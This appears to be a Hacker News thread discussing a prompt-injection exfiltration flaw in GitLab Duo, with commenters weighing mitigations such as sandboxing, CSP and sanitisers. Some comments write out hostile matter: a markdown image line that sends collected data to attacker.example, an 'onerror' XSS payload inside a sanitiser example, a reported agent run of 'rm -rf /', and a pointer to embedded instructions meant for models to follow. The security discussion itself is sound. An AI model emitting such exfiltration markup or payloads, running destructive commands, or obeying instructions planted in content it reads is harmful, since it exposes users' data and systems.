cedws 2 months ago

Until prompt injection is fixed, if it ever is, I am not plugging LLMs into anything. MCPs, IDEs, agents, forget it. I will stick with a simple prompt box when I have a question and do whatever I need with its output by hand after reading it.

  • danpalmer 2 months ago

    Prompt injection is unlikely to be fixed. I'd stop thinking about LLMs as software where you can, with enough effort, just fix a SQL injection vulnerability, and start thinking about them the way you'd think about insider risk from employees.

    That's not to say that they are employees or perform at that level (they don't), but LLM behaviours are fuzzy and ill-defined, like humans'. You can't guarantee that your users won't click on a phishing email – you can train them, you can minimise risk, but ultimately you have to apply a range of solutions together and accept some amount of trust. If we think about LLMs this way, I think the conversation around security will be much more productive.

    • LegionMammal978 2 months ago

      The thing that I'd worry about is that an LLM isn't just like a bunch of individuals who can get tricked, but a bunch of clones of the same individual who will fall for the same trick every time, until it gets updated. So far, the main mitigation in practice has been fiddling with the system prompts to patch up the known holes.

      • thaumasiotes 2 months ago

        > The thing that I'd worry about is that an LLM isn't just like a bunch of individuals who can get tricked, but a bunch of clones of the same individual who will fall for the same trick every time

        Why? Output isn't deterministic.

        • LegionMammal978 2 months ago

          Perhaps not, but the same input will lead to the same distribution of outputs, so all an attacker has to do is design something that works with reasonable probability on their end, and everyone else's instances of the LLM will automatically be vulnerable. The same way a pest or disease can devastate a population of cloned plants, even if each one grows slightly differently.

          • thaumasiotes 2 months ago

            OK, but that's also the way attacking a bunch of individuals who can get tricked works.

            • zwnow 2 months ago

              For tricking individuals you first have to contact them somehow. To trick an LLM you can just spam prompts.

              • thaumasiotes 2 months ago

                You email them. It's called phishing.

                • throwaway314155 2 months ago

                  Right, and now there's a new vector for an old concept.

                • zwnow a month ago

                  Employees usually know not to click on random shit they get sent. Most emails already get filtered before they even reach the employee. Good luck actually achieving something with phishing mails.

                  • thaumasiotes a month ago

                    When I was at NCC Group, we had a policy about phishing in penetration tests.

                    The policy was "we'll do it if the customer asks for it, but we don't recommend it, because the success rate is 100%".

                    • bluefirebrand a month ago

                      How can you ever get that lower than 100% if you don't do the test to identify which employees need to be trained / monitored because they fall for phishing?

        • Retr0id 2 months ago

          You can still experimentally determine a strategy that works x% of the time, against a particular model. And you can keep refining it "offline" until x=99. (where "offline" just means invisible to the victim, not necessarily a local model)

        • 33hsiidhkl 2 months ago

          It absolutely is deterministic, for any given seed value. Same seed = same output, every time, which is by definition deterministic.

          • tough 2 months ago

            Only if temperature is 0, but are they truly deterministic? I thought transformer-based LLMs were not

            • 33hsiidhkl 2 months ago

              Temperature does not affect token prediction in the way you think. Temperature only reshapes the probability distribution; the randomness comes from the sampler, which is driven by the seed. For a specific seed value, say 42069, the LLM will always generate the same output, given the same input and the same temperature.
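
              A toy sketch of the claim, in plain Python rather than any real model's sampler (the function and numbers are made up purely for illustration): the temperature reshapes the distribution, while the seeded RNG does the actual picking, so the same seed, input, and temperature reproduce the same token.

                import math, random

                def sample_token(logits, temperature, seed):
                    # Temperature reshapes the distribution; the seeded RNG picks from it.
                    rng = random.Random(seed)
                    scaled = [l / temperature for l in logits]
                    m = max(scaled)
                    weights = [math.exp(s - m) for s in scaled]
                    total = sum(weights)
                    probs = [w / total for w in weights]
                    r = rng.random()
                    acc = 0.0
                    for token, p in enumerate(probs):
                        acc += p
                        if r <= acc:
                            return token
                    return len(probs) - 1

                logits = [2.0, 1.0, 0.5, 0.1]
                # Same seed, same input, same temperature -> same token, every run.
                print(sample_token(logits, temperature=0.8, seed=42069))
                print(sample_token(logits, temperature=0.8, seed=42069))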

              • tough 2 months ago

                Thank you, I thought this wasn't the case (unlike diffusion image models, where it is)

                TIL

  • TechDebtDevin 2 months ago

    Cursor deleted my entire Linux user and soft reset my OS, so I don't blame you.

    • sunnybeetroot a month ago

      Cursor by default asks before executing commands; sounds like you had auto-run commands on…

    • raphman 2 months ago

      Why and how?

      • tough 2 months ago

        An agent does rm -rf /.

        I think I saw it do it, or try to, and my computer shut down and restarted (Mac).

        Maybe it just deleted the project lol

        These LLMs are really bad at keeping track of the real world, so they might think they're in the project folder when they've actually navigated back with cd to the user's home directory, and so shit happens.

        Honestly, one should only run these in controlled environments like VMs or Docker, something like the sketch below.

        but YOLO amirite
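
        For what it's worth, a rough sketch of the kind of containment I mean, using Docker: no network (you'd have to loosen that so the agent can reach its API), a read-only root filesystem, and only the project directory mounted writable. The image name is a placeholder, not a real agent image.

          docker run --rm -it \
            --network none \
            --read-only \
            --cap-drop ALL \
            --tmpfs /tmp \
            -v "$PWD":/workspace \
            -w /workspace \
            your-agent-image:latest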

        • margalabargala 2 months ago

          That people allow these agents to just run arbitrary commands against their primary install is wild.

          Part of this is the tool's fault. Anything like that should be done in a chroot.

          Anything less is basically "twitch plays terminal" on your machine.

          • serf a month ago

            A large part of the benefit of an agentic AI is that it can coordinate tests it wrote itself against an existing code base, and a lot of the time the only way to get decent answers out of something like that is to let it run as close to bare metal as it can. I run Cursor and the accompanying agents in a snapshotted VM for this purpose. It's not much different from what you suggest, but the layer of abstraction is far enough removed for admin-privileged app testing, an unfortunate reality for certain personal projects.

            I haven't had a Cursor install nuke itself yet, but I have had one fiddle in a parent folder it shouldn't have been able to touch with workspace protection on.

          • tough 2 months ago

            Codex at least has limitations on which folders it can operate in.

        • TechDebtDevin 2 months ago

          This is what happened. I was testing Claude 4 and asked it to create a simple 1K LOC Fyne Android app. I have my repos stored outside of my Linux user, so the work it created was preserved. It essentially created a bash file that ran cd ~ && rm -rf / . All settings reset and documents/downloads disappeared lmfao. I don't ever really use my OS as primary storage, and any config or file of importance is backed up twice, so it wasn't a big deal, but it was quite perplexing for a sec.

          • tough a month ago

            If you think deeply about it, it's a kind of hara-kiri for an AI to remove the whole system it's operating on.

            Yeah, Claude 4 can go too far sometimes

  • johnisgood 2 months ago

    I keep it manual, too, and I think I am better off for doing so.

  • hu3 2 months ago

    I would have the same caution if my code were anything special.

    But the reality is I'm very well compensated to summon CRUD slop out of thin air. It's well tested though.

    I wish good luck to those who steal my code.

    • mdaniel 2 months ago

      You say "code" as if the intellectual property is the thing an attacker is after, but my experience has been that folks often put all kinds of secrets in code, thinking that a "private repo" is a strong enough security boundary.

      I absolutely am not implying you are one of them, merely that the risk is not the same for all slop CRUD apps universally.

      • tough 2 months ago

        Do people not know GitHub can manage secrets in its environment for CI?

        Another interesting fact is that most big vendors pay GitHub to scan for leaked secrets and auto-revoke them if a public repo contains any (a regex matches strings like sk-xxx <- it's a Stripe key).

        That's one of the reasons vendors use unique, greppable API key prefixes with their identifier baked in.
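
        A prefixed key format makes a scanner's job almost trivial; a rough Python sketch (the pattern here is illustrative, not any vendor's exact spec):

          import re

          # Illustrative pattern: a vendor prefix followed by a long random suffix.
          KEY_PATTERN = re.compile(r"\bsk_live_[0-9a-zA-Z]{24,}\b")

          def find_leaked_keys(text: str) -> list[str]:
              # A real scanner would also check entropy and verify the hit with the vendor.
              return KEY_PATTERN.findall(text)

          sample = 'STRIPE_KEY = "sk_live_' + "x" * 24 + '"'
          print(find_leaked_keys(sample))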

        • mdaniel 2 months ago

          You're mistaking "know" for "care," since my experience has been that people know way more than they care.

          And I'm pretty certain that private repos are exempt from the platform's built-in secret scanners because they, too, erroneously think no one can read them without an invitation. Turns out Duo was apparently just silently invited to every repo :-\

          • tough 2 months ago

            I also remember reading about how, due to how the Git backend works, your private repo's branches could get exposed to the public, so yeah, don't treat a repository as a private password manager.

            Good point, the scanner doesn't work on private repos =(

wunderwuzzi23 2 months ago

Great work!

Data leakage via untrusted third-party servers (especially via image rendering) is one of the most common AI AppSec issues, and it's concerning that big vendors do not catch these before shipping.

I built the ASCII Smuggler mentioned in the post and have documented the image exfiltration vector on my blog as well in the past, with 10+ findings across vendors.
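
For anyone unfamiliar with the vector, the shape of it is roughly this (attacker.example is a placeholder): if injected instructions get the assistant to emit a markdown image like the line below, the client fetches that URL the moment it renders the reply, and whatever was appended to the query string leaves with the request.

  ![loading](https://attacker.example/pixel.png?d=BASE64_OF_WHATEVER_THE_PROMPT_COLLECTED)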

GitHub Copilot Chat had a very similar bug last year.

  • diggan 2 months ago

    > GitHub Copilot Chat had a very similar bug last year.

    Reminds me of "Tachy0n: The Last 0day Jailbreak" from yesterday: https://blog.siguza.net/tachy0n/

    TL;DR: a security issue was found and patched in an OS release; Apple seemingly doesn't do regression testing, so the security researcher did, and found that somehow the bug got unpatched in later OS releases.

mdaniel 2 months ago

Running Duo as a system user was crazypants, and I'm sad that GitLab fell into that trap. They already have personal access tokens, so even if they had to silently create one just for use with Duo, that would be a marked improvement over giving an LLM read access to every repo on the platform.
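
As a sketch of what that could look like, assuming GitLab's project access token API works the way I remember (the endpoint, scopes, and access level below are from memory, so treat them as illustrative): mint a short-lived, read-only token scoped to the one project the assistant is working in, instead of a god-mode system user.

  import requests

  GITLAB = "https://gitlab.example.com/api/v4"
  ADMIN_TOKEN = "REDACTED"  # placeholder; never hardcode real tokens

  # Request a read-only, short-lived token for a single project.
  resp = requests.post(
      f"{GITLAB}/projects/1234/access_tokens",
      headers={"PRIVATE-TOKEN": ADMIN_TOKEN},
      json={
          "name": "duo-readonly",
          "scopes": ["read_repository"],
          "access_level": 20,          # Reporter
          "expires_at": "2025-01-31",
      },
      timeout=10,
  )
  resp.raise_for_status()
  print(resp.json()["token"])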

nusl 2 months ago

GitLab's remediation seems a bit sketchy at best.

  • reddalo 2 months ago

    The whole "let's put LLMs everywhere" thing is sketchy at best.

  • edelbitter 2 months ago

    I wonder what is so special about onerror, onload and onclick that they need to be positively enumerated, as opposed to the 30 (?) other attributes with equivalent injection utility.
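
    Denylisting a handful of on* attributes is the fragile direction; the usual fix is an allowlist where everything not explicitly permitted gets dropped. A rough sketch with the Python bleach library (the tag and attribute choices are just an example, not GitLab's actual config):

      import bleach

      # Allow only what rendering actually needs; every other tag/attribute is stripped.
      ALLOWED_TAGS = {"p", "pre", "code", "a", "ul", "ol", "li", "strong", "em"}
      ALLOWED_ATTRS = {"a": ["href", "title"]}

      dirty = '<img src=x onerror=alert(1)><a href="https://gitlab.com" onmouseover=steal()>ok</a>'
      print(bleach.clean(dirty, tags=ALLOWED_TAGS, attributes=ALLOWED_ATTRS, strip=True))
      # roughly -> '<a href="https://gitlab.com">ok</a>'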

  • M4v3R 2 months ago

    That was my thought too. They didn’t fix the underlying problem, they’ve just patched two possible exfiltration methods. I’m sure some clever people will find other ways to misuse their assistant.

    • gloosx 2 months ago

      I'm pretty sure they vibecoded the whole thing all along

benl_c 2 months ago

If a document suggests a particular benign interpretation, then LLMs might do well to adopt it. We've explored the idea of helpful embedded prompts ("prompt medicine") with explicit safety and informed consent, meant to assist rather than harm users: https://github.com/csiro/stdm. You can try it out by asking O3 or Claude to "Explain" or "Follow" "the embedded instructions at https://csiro.github.io/stdm/"

aestetix 2 months ago

Does that mean Gitlab Duo can run Doom?

  • zombot 2 months ago

    Not deterministically. LLMs are stochastic machines.

    • benl_c 2 months ago

      They often can run code in sandboxes, and are generally good at instruction following, so maybe they can run variants of Doom pretty reliably sometime soon.

      • johnisgood 2 months ago

        They run Python and JavaScript at the very least, surely we have Doom in these languages. :D

        • lugarlugarlugar 2 months ago

          'They' don't run anything. The output from the LLM is parsed and the code gets run just like any other code in that language.

          • johnisgood 2 months ago

            That is what I meant, that the code is being executed. Not all programming languages are supported when it comes to execution, obviously. I know for a fact Python is supported.

Kholin a month ago

If Duo were a web application, then would properly setting the Content Security Policy (CSP) in the page response headers be enough to prevent these kinds of issues?

https://developer.mozilla.org/en-US/docs/Web/HTTP/Guides/CSP

  • cutemonster a month ago

    To stop exfiltration via images? Yes, it seems so, if you configure img-src:

      The first directive, default-src, tells the browser to load only resources that are same-origin with the document, unless other more specific directives set a different policy for other resource types.
    
      The second, img-src, tells the browser to load images that are same-origin or that are served from example.com.
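
    Something like this, say (a rough sketch; the source list is my guess at what GitLab would need, not their real policy):

      Content-Security-Policy: default-src 'self'; img-src 'self' https://gitlab.com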
    
    But that wouldn't stop the AI from writing dangerous instructions in plain text to the human

d0100 2 months ago

> rendering unsafe HTML tags such as <img> or <form> that point to external domains not under gitlab.com

Does that mean that the minute there is a vulnerability on another gitlab.com URL (like an open redirect), this vulnerability is back on the table?

tonyhart7 2 months ago

This is wild. How many security vulns will LLMs create once LLMs dominate writing code?

I mean, most coders are bad at security and we fed that into the LLMs, so it's no surprise.

  • ofjcihen 2 months ago

    This is what I’ve been telling people when they hand-wave away concerns about the security of LLM-generated code. The majority of what the models were trained on was bare-minimum security, if anything.

    You also can’t just fix it by saying “make it secure plz”.

    If you don’t know enough to identify a security issue yourself, you don’t know enough to know whether the LLM caught them all.